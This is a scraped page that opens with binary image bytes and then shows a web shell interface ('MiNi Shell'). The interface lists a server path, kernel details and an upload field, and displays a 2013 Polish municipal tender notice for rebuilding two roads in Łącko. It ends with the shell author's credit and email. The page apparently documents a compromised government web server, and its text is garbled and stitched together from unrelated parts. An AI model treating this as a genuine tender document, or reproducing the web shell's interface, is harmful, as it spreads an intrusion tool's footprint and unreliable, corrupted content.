JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130308/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130308/94196-N-2013.html

<p class="kh_header"><b>Łącko: Odbudowa  drogi gminnej  Do Biela nr 292178 K  w miejscowości Kicznia w km 0+820 - 1+620;
Odbudowa drogi gminnej  Na Paproć nr 291907 K w miejscowości  Zabrzeż w km 0+768 - 1+268, 1+368 - 1+ 468</b><br>
<b>Numer ogłoszenia: 94196 - 2013; data zamieszczenia: 08.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łącko , Łącko 445, 33-390 Łącko, woj. małopolskie, tel. 18 41 40 710, faks 18 41 40 740.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.lacko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa  drogi gminnej  Do Biela nr 292178 K  w miejscowości Kicznia w km 0+820 - 1+620;
Odbudowa drogi gminnej  Na Paproć nr 291907 K w miejscowości  Zabrzeż w km 0+768 - 1+268, 1+368 - 1+ 468.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest wykonanie odbudowy  dróg w  szczególności :
- wykonanie  podbudowy  z  kruszyw  naturalnych  , łamanych,
- wykonanie  nawierzchni  z mieszanek mineralno bitumicznych asfaltowych
- oraz innych  robót   towarzyszących
- oznakowanie   robót  zgodnie  z Instrukcją  o   oznakowaniu  robót  drogowych
- wszelkie  prace przygotowawcze , porządkowe, zabezpieczenie  robót  pod względem  bhp   
- badanie   powykonawcze: wykonanie na każdej drodze 1 odwiertu   z pobraniem próbki potwierdzającej grubość ułożenia  masy asfaltowej
Szczegółowy opis i zakres robót określają  Specyfikacje Techniczne - zał. nr 8 SIWZ ,  przedmiar  robót    zał. nr  9 SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dla przedmiotu zamówienia analogicznego do określonego w pkt. II. 1.3 i zakresu do 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą że   w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie , wykonali co najmniej: dwie roboty polegające  na remoncie, modernizacji, przebudowie lub odbudowie drogi kategorii gminna   o nawierzchni  bitumicznej o łącznej długości nie mniejszej niż 1 km.
Na potwierdzenie  warunku  Wykonawca złoży zał. nr 6  SIWZ - Wykaz robót. W wykazie należy wykazać roboty spełniające warunki określone w niniejszym punkcie. Do wykazu  należy  dołączyć dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz  wskazujący, czy  zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia w oparciu o wymagane dokumenty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą  że dysponują co najmniej :
a) jedną osobą, która pełniła będzie funkcję kierownika  robót, posiadającą  wykształcenie  techniczne i uprawnienia budowlane do kierowania robotami  budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.  . Na potwierdzenie  warunku  Wykonawca złoży zał. nr  4  SIWZ  Wykaz osób   oraz  Oświadczenie o uprawnieniach  zał. nr  5 SIWZ.
Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia w oparciu o wymagane dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy składając ofertę na formularzu wg wzoru - zał. nr 1 do SIWZ  zobowiązani są w celu potwierdzenia  spełnienia warunków udziału w postępowaniu oraz wykazania  braku podstaw  do wykluczenia  z postępowania  o udzielenie zamówienia wykonawcy  w okolicznościach o których mowa   w art. 24 ust. 1 Ustawy  złożyć następujące dokumenty:
1. W zakresie potwierdzenia spełnienia warunków  przez  wykonawcę , o których mowa  w  art. 22 ust.1 ustawy , należy  przedłożyć
1.1 oświadczenie o spełnieniu warunków w postępowaniu  - wg wzoru zał. nr 2   do SIWZ , 
1.2 oświadczenie ,że osoby ,które  będą uczestniczyć w wykonywaniu  zamówienia , posiadają  wymagane  uprawnienia , jeżeli  ustawy nakładają  obowiązek  posiadania takich uprawnień - wg wzoru zał. nr  5 do SIWZ;
1.3 wykaz  osób , które będą uczestniczyć w wykonywaniu zamówienia ( zał. nr 4 do SIWZ) w zakresie niezbędnym do wykazania spełnienia warunku, o którym mowa w rozdziale II pkt. 1 ppkt 1 d SIWZ, w szczególności  odpowiedzialnych  za świadczenie  usług , kontrolę jakości  lub kierowanie  robotami budowlanymi , wraz z informacjami  na temat ich   kwalifikacji  zawodowych , doświadczenia i wykształcenia  niezbędnych  dla wykonania zmówienia , a także zakresu 
wykonywanych  przez nie czynności , oraz informacją o podstawie  do dysponowania tymi osobami, 
1.4 wykaz robót budowlanych  wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie , wraz z podaniem  ich rodzaju  i wartości , daty i miejsca wykonania ( zał. nr 6 do SIWZ). W wykazie  należy  wskazać roboty  spełniające warunki określone w   Rozdziale II pkt. 1 ppkt. 1 b SIWZ. Do wykazu należy dołączyć dotyczące  najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, 
1.5. w przypadku gdy Wykonawca będzie polegał na wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania  zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie  od charakteru prawnego łączących go z nimi stosunków na podstawie  art. 26 ust. 2b, oprócz  zobowiązania , o  którym mowa w art. 26 ust. 2b, Wykonawca  zobowiązany jest  do przedłożenia  dokumentów dotyczących: 
a) zakresu dostępnych wykonawcy zasobów innego podmiotu;
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia,
c)  charakteru, stosunku, jaki będzie  łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy  wykonywaniu zamówienia
oraz oświadczenia i dokumenty określone  w punkcie 2 ppkt. 2.1, 2.2 poniżej w odniesieniu do tych podmiotów.
2. W zakresie potwierdzenia  niepodlegania wykluczeniu na podstawie  art. 24 ust.1  należy przedłożyć :
2.1 oświadczenie o braku podstaw  do wykluczenia o których mowa w art.24 ust.1 Ustawy - wg wzoru zał. nr 3; 
2.2 aktualny odpis z właściwego  rejestru lub  z centralnej ewidencji i informacji o działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu w celu wykazania braku podstaw do wykluczenia w oparciu  o art. 24 ust. 1 pkt. 2  Ustawy  wystawionego nie wcześniej niż  6 m-cy  przed upływem terminu  składania  ofert; 
2.3  Lista  podmiotów należących do tej samej grupy kapitałowej, o której mowa  w art. 24 ust. 2 pkt. 5, albo informacja  o tym, że  nie należy do grupy kapitałowej.
2.4. Inne dokumenty tj. kosztorys ofertowy sporządzony w oparciu o zamieszczony przez Zamawiającego przedmiar robót nr 9 do SIWZ.
2.5. Inne dokumenty: Pełnomocnictwo ( jeśli dotyczy)
3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast  dokumentu o  których mowa w pkt.2.2 - składa dokument lub dokumenty  wystawione w kraju , w którym ma siedzibę  lub miejsce
zamieszkania, potwierdzające odpowiednio ,że nie otwarto jego likwidacji ani nie ogłoszono  upadłości, wystawione nie wcześniej  niż 6 miesięcy przed upływem  terminu  składania wniosków o dopuszczenie do udziału  w postępowaniu o udzielenie zamówienia albo  składania  ofert. 
4.Jeżeli w miejscu zamieszkania osoby  lub  w kraju  w którym wykonawca  ma siedzibę  lub miejsce zamieszkania , nie  wydaje się  dokumentów o których mowa w pkt. 3.  zastępuje się je  dokumentem zawierającym  oświadczenie w którym określa  się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym  albo organem samorządu  zawodowego lub   gospodarczego  odpowiednio  miejsca zamieszkania  osoby lub kraju , w którym  wykonawca ma siedzibę  lub miejsce   zamieszkania lub przed notariuszem .
5. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
Wykonawcy wspólnie  ubiegający się o zamówienie:
5.1. ponoszą solidarną odpowiedzialność za  niewykonanie lub nienależyte wykonanie zobowiązania;
5.2  zobowiązani są  do  ustanowienia pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego. 
5.3 Pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną oraz fakt ustanowienia     Pełnomocnika  musi wynikać z załączonych do oferty dokumentów;
5.4  Pełnomocnictwo musi być złożone w oryginale lub kopii poświadczonej notarialnie;
5.5 Wszelka korespondencja prowadzona będzie przez zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy  wpisać w formularzu ofertowym.
5.6 W przypadku wykonawców wspólnie składających ofertę Zamawiający wymaga, aby każdy  Wykonawca  złożył dokumenty na potwierdzenie, że  nie podlega wykluczeniu na podstawie art. 24 ust. 1.
5.7 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia , określone warunki winien spełniać jeden Wykonawca lub Wykonawcy wspólnie. 
6.   W przypadku  wykonawców wspólnie  ubiegających się  o udzielenie zamówienia  oraz w przypadku  podmiotów , o których mowa w rozdziale II pkt. 3 SIWZ, kopie dokumentów  dotyczących  odpowiednio wykonawcy  lub tych podmiotów  są   poświadczane  za zgodność z oryginałem  przez wykonawcę lub te podmioty.
 7.  Wymagane dokumenty mogą być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości  Zamawiający  może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.
8.  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień  umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty , na podstawie której dokonano wyboru Wykonawcy. Zmiana  umowy  także istotna może być dokonana w przypadku okoliczności, których nie można było przewidzieć w chwili zawarcia    umowy. Zmiana umowy także istotna może  być dokonana w szczególności w przypadku : 
a) wydłużenia terminu zakończenia realizacji umowy na wskutek zaistnienia siły wyższej (np. wystąpienie nadzwyczajnych warunków pogodowych). O interpretacji siły wyższej i ewentualnym uznaniu przedłużenia terminu wykonania robót budowlanych z tego powodu będzie decydował Zamawiający w trakcie realizacji robót. 
Termin może ulec przedłużeniu na  czas trwania tych okoliczności
b) z uwagi  na niezależne od Stron umowy zmiany dotyczące osób kluczowych dla realizacji umowy, np.  kierownika budowy i robót, inspektora nadzoru, osób reprezentujących Strony ( w szczególności choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne),
c) wystąpienia konieczności zmiany podwykonawcy dla części zamówienia, którą wykonawca wskazał w ofercie, że powierzy ją do wykonania podwykonawcy, za  zgodą  Zamawiającego z zachowaniem zasad dot.  podwykonawców określonych w umowie,
d) w szczególnie  uzasadnionym przypadku wystąpienia konieczności realizacji przez podwykonawcę części zamówienia, której Wykonawca nie wskazał w ofercie, że powierzy ją  do wykonania podwykonawcy, za zgodą Zamawiającego i z zachowaniem zasad dotyczących podwykonawców określonych  we wzorze umowy w SIWZ,
e) sytuacji, gdy Wykonawca opierał się na  zasobach podmiotów  trzecich  wykazując spełnienie warunków udziału w postępowaniu, dopuszcza się zmianę tych podmiotów na etapie realizacji zamówienia, pod warunkiem, że  nowy podmiot wykaże spełnienie warunków w zakresie nie  mniejszym niż  wskazany na etapie  postępowania o zamówienie publiczne,
f) wydłużenia terminu realizacji zamówienia spowodowane zmianami: w dokumentacji technicznej, wystąpieniem robót dodatkowych, których wykonanie powoduje przesunięcie terminu wykonania zadania głównego, w uzasadnionych przypadkach, gdy realizacja zadania (robót budowlanych) według dokumentacji technicznej i SST powodowałaby wadliwe
wykonanie przedmiotu umowy,
g) zmniejszenia zakresu przedmiotu umowy z przyczyn o obiektywnym charakterze, istotnej
zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w
interesie publicznym,
h) nastąpi konieczność skrócenia terminu realizacji umowy ze względu na zmniejszenie zakresów rzeczowych zamówienia na roboty budowlane zaakceptowanych przez Zamawiającego,
i) zmiana terminu umowy, jeżeli zmiana będą następstwem działania organów sądowych lub administracyjnych, w szczególności dotyczących: - przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp., odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej, konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu administracyjnego, którego konieczności nie przewidziano przy zawieraniu umowy,
j) zmian  regulacji prawnych obowiązujących w dniu zawarcia  umowy
k) zmian teleadresowych Stron umowy określonych w umowie
l) w przypadku zmian korzystnych  dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lacko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy Łącko
33-390 Łacko 445 pok. 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2013 godzina 10:30, miejsce: Urząd Gminy Łącko
33-390 Łacko 445 pok. 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com